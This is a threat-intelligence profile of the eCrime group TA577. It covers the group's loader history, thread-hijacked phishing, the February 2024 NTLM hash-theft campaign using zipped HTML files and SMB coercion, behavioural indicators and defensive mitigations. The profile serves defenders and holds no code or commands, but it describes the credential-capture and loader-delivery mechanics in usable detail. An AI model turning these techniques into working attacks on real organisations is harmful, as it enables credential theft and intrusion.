TA577 | Threat Actor Profile

One of the most prolific and adaptive initial access brokers in the eCrime ecosystem — informally nicknamed the "letters" affiliate for its use of campaign IDs like AA, BB, and TR. TA577 functioned as one of Qbot's primary distributors for years, then rapidly pivoted through the disruption cycle: DarkGate and IcedID after the August 2023 Qbot takedown, Pikabot and Latrodectus by late 2023, and a previously unobserved capability in February 2024 — large-scale NTLM hash theft via thread-hijacked HTML attachments. Proofpoint has associated TA577 campaigns with follow-on Black Basta ransomware infections, and the group's sustained operational tempo, rapid TTP iteration, and broadening from pure malware delivery toward credential collection mark it as one of the most adaptable eCrime actors currently tracked.

attributed origin Eastern Europe — Russian-speaking (assessed)

operator type Initial Access Broker (IAB)

active since Mid-2020 (Proofpoint tracking)

primary motivation Financial — access sale to ransomware groups

ransomware link Black Basta (confirmed downstream)

payload portfolio Qbot → DarkGate/IcedID → Pikabot/Latrodectus

2024 new capability NTLM hash theft via HTML/SMB

campaign scale Tens of thousands of messages per campaign

threat level High

Overview

TA577 is a financially motivated cybercrime threat actor tracked by Proofpoint since mid-2020, also identified by IBM X-Force as Hive0118. The group operates as an initial access broker — running high-volume phishing infrastructure to install malware loaders on enterprise endpoints, then selling or providing that access downstream to ransomware operators, most notably those connected to Black Basta. TA577 is considered one of the most capable and operationally consistent IABs in the current eCrime ecosystem, distinguished not by the sophistication of any single technique but by the speed and reliability with which it adapts to takedowns and detection cycles.

The group built its reputation as a primary Qbot (QakBot) affiliate — informally called the "letters" affiliate because its Qbot campaign identifiers used letter combinations like AA, BB, and TR, distinguishing it from the parallel "presidents" affiliate TA570 that used US president names. When the FBI and international law enforcement disrupted Qbot infrastructure in August 2023, TA577 moved faster than any other major Qbot affiliate to replace it — deploying DarkGate, IcedID, and Pikabot within weeks, and becoming one of the first actors observed distributing Latrodectus (a new loader likely written by the same developers as IcedID) in November 2023.

In February 2024, Proofpoint documented a capability shift that had never been previously observed from TA577: targeted NTLM hash theft campaigns using thread-hijacked emails with zipped HTML attachments that silently triggered SMB connections to attacker-controlled servers, capturing NTLMv2 challenge/response pairs. The campaigns sent tens of thousands of messages to hundreds of organizations globally over two consecutive days — with no malware payload, only credential capture. This evolution from pure malware distribution to active credential reconnaissance marked a significant expansion of the group's operational scope beyond its IAB role.

active — ongoing 2025 campaigns

TA577 remains active through 2025 and early 2026. In January 2025, the group expanded its campaigns internationally across many industries, with Black Basta intrusion incidents referenced by defenders responding to TA577 initial access activity. October 2024 campaigns continued multi-loader delivery using Pikabot and Latrodectus alongside NTLM-targeted credential theft against large enterprises globally. The group has not shown signs of operational slowdown despite multiple disruptions to the malware families it distributes.

Payload Pivot Timeline

TA577's defining characteristic is the speed of its pivots after disruptions. The timeline below documents the group's payload evolution from Qbot through its current multi-loader and credential-theft operations.

2020–Aug 2023

Qbot / QakBot — Primary Payload

TA577 was one of the two most active Qbot affiliates throughout this period. High-volume phishing campaigns using malicious Office macro documents, later pivoting to OneNote and PDF containers as Microsoft rolled out macro restrictions in 2023. Campaign IDs with letter themes (AA, BB, TR) distinguished TA577 from the TA570 "presidents" affiliate. Follow-on ransomware infections — primarily Black Basta — were the downstream use of access sold from these campaigns. IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike were also distributed during this period.

Aug–Sep 2023

Qbot Takedown — Rapid Pivot to DarkGate and IcedID

The FBI-led Operation Duck Hunt disrupted Qbot infrastructure in August 2023. Within weeks, TA577 had shifted payload delivery to DarkGate — a MaaS loader with built-in defense evasion, C2, and persistence — and IcedID. Deutsche Telekom CERT documented the first TA577 DarkGate campaign on September 22, 2023. The speed of the pivot confirmed that TA577 had existing relationships with alternative malware operators and maintained infrastructure capable of rapid payload substitution.

Late 2023

Pikabot and Latrodectus Adoption

Through November and December 2023, TA577 transitioned primary payload delivery to Pikabot — a modular loader with C2 and anti-analysis capabilities — and was simultaneously the first actor observed distributing Latrodectus, a new downloader Proofpoint assessed as likely written by the same developers as IcedID. TA577 used Latrodectus in at least three campaigns in November 2023 before reverting to Pikabot as the primary payload. Latrodectus subsequently became almost exclusively associated with TA578 from mid-January 2024 onward.

Feb 2024

NTLM Hash Theft — Novel Capability

A previously unobserved TA577 capability: two consecutive campaigns on February 26 and 27 using thread-hijacked emails with zipped HTML attachments. Opening the HTML generated a local file that triggered an SMB connection to an attacker-controlled server, capturing NTLMv2 challenge/response pairs. Tens of thousands of messages targeted hundreds of organizations globally. No malware was delivered — the sole purpose was credential capture. Proofpoint had never previously observed TA577 using this technique.

2024–2025

Multi-Loader Campaigns + Continued Credential Operations

TA577 continued multi-loader campaigns through 2024 and into 2025, combining Pikabot and Latrodectus delivery with ongoing NTLM hash theft operations against large enterprises. IBM X-Force (Hive0118) documented the group delivering Dave-crypted PikaBot samples using crypters associated with former Trickbot/Conti syndicate members, indicating ongoing relationships with the broader Eastern European eCrime ecosystem. January 2025 saw expanded international campaign activity with Black Basta intrusion incidents continuing to follow TA577 initial access.

Target Profile

TA577 is explicitly broad-sector and broad-geography in its targeting — Proofpoint describes the group as conducting "broad targeting across various industries and geographies." Unlike espionage APTs with sector-specific mandates, TA577's targeting is driven by volume and the downstream requirements of its ransomware customers rather than any intelligence collection priority.

All sectors — opportunistic: TA577 has targeted organizations across financial services, healthcare, government, manufacturing, professional services, education, and technology. No sector exclusions are documented. The group's high-volume campaigns are designed to succeed through scale rather than precision.
Global geography: Campaigns have targeted organizations in North America, Europe, the Asia-Pacific region, and globally. The February 2024 NTLM hash theft campaigns alone targeted hundreds of organizations across multiple countries simultaneously.
Enterprise-scale targets: The downstream ransomware connection to Black Basta indicates a preference for large enterprise targets capable of paying substantial ransoms — TA577's access sales are most valuable when they lead to high-revenue ransomware negotiations. Small organizations compromised in bulk phishing are secondary to the enterprise access that drives IAB revenue.
Email-reachable employees: TA577's initial access model is email-centric. Any organization whose employees receive external email and may open attachments or click links is in scope. Thread hijacking campaigns specifically target employees who receive replies to existing email chains — a scenario that reduces suspicion even for security-aware users.

Tactics, Techniques & Procedures

TA577's TTP set is defined by email delivery sophistication and rapid adaptation. The group invests in delivery mechanism quality — thread hijacking, container formats that bypass macro restrictions, and novel authentication coercion — rather than custom malware development.

mitre id	technique	description
T1566.001	Thread Hijacking — Reply-Chain Injection	TA577's signature delivery technique. Legitimate prior email threads — stolen from compromised mailboxes or obtained through other means — are used as the basis for malicious "reply" emails. The attacker's message appears in the recipient's inbox as a reply to an existing conversation they recognize, significantly increasing the likelihood that the attachment or link is opened. Thread hijacking was used in the 2024 NTLM campaigns, NTLM campaigns, and consistently throughout Pikabot and Latrodectus delivery.
T1204.002	Container Delivery — ZIP / HTML / OneNote / PDF	Following Microsoft's 2022 rollout of macro blocking for documents from the internet, TA577 pivoted to container-based delivery: malicious Office documents inside password-protected ZIP archives, HTML smuggling (embedding Base64-encoded payloads in HTML files that reconstruct and execute on the client), OneNote files with embedded malicious links, and PDF files with URL-based payload retrieval. The NTLM campaign delivered HTML files inside ZIP archives specifically to generate a local file — bypassing Outlook's July 2023 patch that would have blocked direct file URI links in email bodies.
T1187	NTLM Hash Capture — SMB Coercion	First observed February 26–27, 2024. Thread-hijacked emails deliver ZIP archives containing HTML files. Opening the HTML creates a local file that triggers a meta-refresh connecting to an attacker-controlled SMB server via a file scheme URI ending in .txt. Windows automatically attempts NTLM authentication against the SMB server, sending NTLMv2 challenge/response pairs. The attacker captures these using Impacket on the SMB server. Stolen NTLMv2 hashes can be cracked offline for plaintext passwords or used directly in pass-the-hash attacks. Disabling SMB guest access does not prevent capture — the system attempts authentication regardless. Blocking outbound SMB (ports 445/139) at the network perimeter is the primary mitigation.
T1059.001	Living-Off-the-Land — PowerShell / Rundll32	After initial access via phishing, TA577 uses LOLBins (Living-Off-the-Land Binaries) including PowerShell, CMD, and Rundll32 to execute malicious payloads downloaded by the loader. This reduces the reliance on custom executables and leverages trusted Windows components that may not trigger endpoint detection. Fast flux DNS and compromised WordPress sites serve payloads to compromised victims.
T1071	Fast Flux DNS / WordPress C2 Infrastructure	TA577 uses fast flux DNS — rapidly rotating IP addresses for C2 domains — to impede takedowns and domain-based blocking. Compromised WordPress sites serve as intermediate stages for payload hosting and C2 relay, leveraging the reputation of legitimate websites to bypass URL reputation filters on email gateways and proxies.
T1078	Credential-to-Persistence Chain	The February 2024 NTLM campaigns produced no malware delivery — their function appears to be reconnaissance: identifying valuable targets by capturing credentials and environment details (computer names, domain names, usernames) from the NTLMv2 authentication attempt. Will Dormann and other researchers suggested this may be used to assess which targets are worth targeting with subsequent ransomware-enabling malware deployment. The pass-the-hash capability of captured NTLMv2 hashes also enables direct lateral movement in environments without MFA.

Known Campaigns

Selected documented operations highlighting TA577's payload evolution and expanding capability set.

Qbot "Letters" Affiliate Campaigns 2020–2023

TA577's foundational activity as one of the two largest Qbot affiliates — the "letters" campaign identifier theme (AA, BB, TR) distinguishing it from TA570's president-themed IDs. Campaigns ran continuously across multiple sectors and geographies, deploying Qbot via malicious Office documents. As Microsoft incrementally restricted macros (macros disabled for downloaded files in July 2022), TA577 adapted delivery through password-protected ZIPs, ISO containers, and OneNote files. Black Basta ransomware was documented as a downstream outcome of TA577-sourced access. IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike were distributed alongside Qbot.

Post-Qbot DarkGate Campaign Sep 2023

Deutsche Telekom CERT's CTI team documented TA577's first post-Qbot campaign on September 22, 2023 — less than a month after the August 2023 Qbot disruption. TA577 deployed DarkGate as its primary payload replacement, demonstrating the speed of its pivot. DarkGate's MaaS model (offered on cybercrime forums with built-in defense evasion, C2, and persistence) made it a technically capable Qbot replacement. This campaign validated that TA577's infrastructure and delivery capability were intact post-disruption even as the specific payload changed.

First Latrodectus Distribution Nov 2023

In November 2023, TA577 became the first documented actor to distribute Latrodectus — a new downloader assessed by Proofpoint and Team Cymru as likely written by the same IcedID developers. TA577 used Latrodectus in at least three campaigns using thread-hijacked messages containing URLs leading to zipped JavaScript or ISO files. The zipped JavaScript used curl to download and execute Latrodectus; the ISO contained a LNK executing the embedded DLL with the "nail" export. By late November 2023, TA577 had reverted to Pikabot as its primary payload — Latrodectus subsequently became almost exclusively distributed by TA578.

NTLM Hash Theft — Tens of Thousands of Messages Feb 2024

On February 26 and 27, 2024, TA577 launched two campaigns that Proofpoint had never previously observed from the group: targeted NTLM credential capture with no malware delivery. Thread-hijacked emails delivered ZIP archives containing recipient-customized HTML files (each attachment had a unique hash to complicate signature-based detection). Opening the HTML created a local file that triggered a meta-refresh to a file scheme URI connecting to an attacker-controlled SMB server. Windows automatically authenticated against the SMB server, capturing NTLMv2 hashes. Each victim received a unique ZIP hash; Impacket was deployed on the attacker's SMB servers. The campaigns reached tens of thousands of recipients across hundreds of organizations globally in 48 hours.

Multi-Loader and Credential Campaigns — Global Enterprise Targeting 2024–2025

Through 2024 and continuing into 2025, TA577 sustained parallel operations: multi-loader phishing campaigns delivering Pikabot and Latrodectus for malware-based initial access, alongside continued NTLM hash theft operations targeting large enterprises globally. IBM X-Force documented the group deploying Dave-crypted PikaBot samples using crypters linked to former Conti/Trickbot syndicate members — indicating ongoing collaboration with the broader Eastern European eCrime developer community. January 2025 saw expanded international campaign volume with Black Basta intrusions continuing downstream of TA577 initial access.

Tools & Malware

TA577 does not develop its own malware. It operates as a consumer and distributor of MaaS (malware-as-a-service) platforms, demonstrating rapid adoption of whatever loaders are most evasion-effective at a given moment.

Qbot / QakBot (2020–2023): The group's primary payload for over three years. A modular banking trojan with reconnaissance, credential theft, C2, and anti-analysis capabilities. TA577 was one of two major Qbot affiliates — the other being TA570 ("presidents" affiliate). Disrupted by Operation Duck Hunt (FBI) in August 2023.
Pikabot (2023–present): TA577's most sustained post-Qbot payload. A modular loader with anti-analysis, C2, and payload execution capabilities. TA577 has been observed delivering Pikabot via a variety of continuously evolving attack chains — OneNote attachments, HTML smuggling, disk images, and others — reflecting the group's commitment to adapting delivery mechanisms as each is detected and blocked.
Latrodectus (Nov 2023 — first distributor): A new downloader likely developed by the IcedID authors, first distributed by TA577 in November 2023. IcedID-related backend infrastructure and jumpboxes confirmed during Proofpoint and Team Cymru analysis. Sandbox evasion via process count check, 64-bit verification, and MAC address validation. TA577 used Latrodectus briefly before reverting to Pikabot; TA578 subsequently adopted it as a primary payload.
DarkGate (Sep 2023): A MaaS loader offered on cybercrime forums, adopted by TA577 as an immediate Qbot replacement. Built-in defense evasion, C2, and persistence. TA577 was among the first actors to distribute DarkGate post-Qbot disruption.
IcedID (during 2023 transition): Used alongside DarkGate and Pikabot during the post-Qbot pivot period. TA577's use of IcedID — and its distribution of Latrodectus (likely from IcedID developers) — suggests an established relationship with the IcedID operator network.
Impacket (NTLM campaigns): An open-source Python toolkit used on attacker-controlled SMB servers to capture NTLMv2 challenge/response pairs from victims' automatic NTLM authentication attempts. The presence of Impacket on TA577's SMB servers — a non-standard configuration on legitimate servers — served as an IOC in Proofpoint's 2024 analysis.
Historical payloads — SystemBC, SmokeLoader, Ursnif, Cobalt Strike: Distributed alongside Qbot during the pre-2023 period, providing multiple post-access capability paths for downstream ransomware operators who purchased TA577 access.

Indicators of Compromise

TA577 rotates delivery infrastructure rapidly. Behavioral detection of email delivery patterns and outbound connection behaviors is more durable than specific domain or hash IOCs.

ntlm attack note — blocking guest smb is insufficient

For the 2024 NTLM hash theft campaign: disabling SMB guest access does not prevent credential capture. The victim's system attempts NTLM authentication against the external SMB server regardless of guest access settings, because Windows must authenticate to determine whether guest access is available. The only effective network control is blocking outbound SMB (ports 445 and 139) at the firewall perimeter. Windows 11 provides an additional built-in NTLM-over-SMB blocking option. Organizations using Outlook clients patched since July 2023 are protected against direct file URI links in email bodies — but not if the URI is embedded in an HTML file delivered inside a ZIP archive (the mechanism TA577 used to bypass this patch).

indicators of compromise — behavioral and structural

behavior ZIP archive containing HTML file delivered via thread-hijacked email — NTLM coercion delivery pattern

behavior Outbound SMB connection (port 445) to external IP triggered by HTML file opened from a local path

tool Impacket toolkit present on external SMB server — non-standard configuration indicating phishing infrastructure

behavior Per-recipient unique ZIP hash in bulk campaign — signature bypass evasion pattern (each attachment has unique hash)

behavior Pikabot / Latrodectus execution via curl download of JS/DLL from thread-hijacked email chain URL

infra pattern Fast flux DNS for C2 domains — rapid IP rotation across multiple hosting providers

infra pattern Compromised WordPress sites serving payloads — legitimate-reputation URL in phishing delivery chain

campaign id Qbot campaign IDs with letter themes (AA, BB, TR) — "letters" affiliate attribution pattern (historical)

Mitigation & Defense

TA577's primary attack surface is email — blocking or detecting malicious email delivery is significantly more effective than attempting post-execution containment of the loaders it distributes.

Block outbound SMB at network perimeter: Ports 445 and 139 should not be permitted to reach external internet addresses from internal workstations. This is the primary mitigation against TA577's NTLM hash theft campaign — it prevents the automatic SMB authentication that delivers NTLMv2 hashes to the attacker's server. This control also benefits against a broad class of NTLM coercion attacks beyond TA577's specific technique.
Email gateway controls for ZIP-containing HTML: Filter or sandbox ZIP archives containing HTML files from external senders. HTML files inside ZIPs are a delivery mechanism specifically designed to bypass both Outlook's file URI patch (July 2023) and email scanners that inspect only top-level attachments. An email gateway that recursively inspects archive contents will detect this delivery pattern.
Thread hijacking awareness training: TA577's thread hijacking exploits the trust employees place in replies to recognized email conversations. Security awareness training should explicitly address that a reply from a familiar address on a known thread does not guarantee legitimacy — particularly if the reply contains an unexpected attachment or link. Thread-hijacked phishing remains effective precisely because it bypasses the standard "did I expect this email?" heuristic.
Patch Outlook for file URI blocking: Ensure all Outlook clients are patched with the July 2023 security update (CVE-2023-23397 mitigation context) that blocks direct file scheme URI links in email bodies. This alone does not prevent TA577's ZIP-wrapped HTML technique — but it eliminates the simpler direct URI delivery variant that other actors still use.
Windows 11 NTLM-over-SMB blocking: Windows 11 introduced a built-in feature to block NTLM authentication over SMB — enabling this provides an endpoint-level control supplementing the perimeter SMB block. Organizations that cannot enforce perimeter SMB blocking (e.g., due to legitimate external SMB requirements) should prioritize enabling this Windows 11 control.
Implement or enforce MFA on all domain accounts: NTLM hashes captured by TA577 can be used in pass-the-hash attacks only where MFA is not enforced. For accounts where NTLM pass-the-hash lateral movement is a realistic risk — particularly administrator accounts — MFA enrollment is essential. Stolen NTLMv2 hashes are also crackable offline if the underlying password is weak; enforcing strong password policies reduces the cracking risk for captured hashes.
Configure Group Policy to restrict outgoing NTLM traffic: The Windows Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be set to deny NTLM authentication to external servers entirely, or to an allowlist of known legitimate servers. Setting this to "Deny all" prevents automatic NTLM authentication to attacker-controlled SMB servers without requiring perimeter firewall changes. Proofpoint recommends testing this in audit mode before enforcement, as it can cause authentication failures against legitimate servers.
Monitor for anomalous Pikabot and Latrodectus IoCs: Consult current Proofpoint and Team Cymru threat intelligence feeds for active Pikabot and Latrodectus C2 infrastructure. Both loaders use distinctive C2 communication patterns (Latrodectus uses HTTPS with specific TLS characteristics; Pikabot uses RC4-encrypted C2 over HTTPS). EDR vendors publish detection rules for both families that should be kept current given the active update cycles documented in TA577 campaigns.

analyst note

TA577 illustrates a pattern common to the most durable eCrime actors: the value of the operator exceeds the value of any specific tool they distribute. When Qbot was disrupted, TA577's capability loss was temporary because the group maintained relationships with alternative MaaS operators, established delivery infrastructure, and a large stock of compromised email threads for thread hijacking. The February 2024 NTLM campaigns are particularly significant because they represent TA577 expanding beyond its IAB role — suggesting either a strategic decision to verticalize operations or a testing of reconnaissance capability for subsequent targeting. Proofpoint's observation that "the rate at which TA577 adopts and distributes new TTPs suggests the threat actor likely has the time, resources, and experience to rapidly iterate" is a consistent theme: this is not a small opportunistic actor but a well-resourced professional eCrime operation with sustained development capacity.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile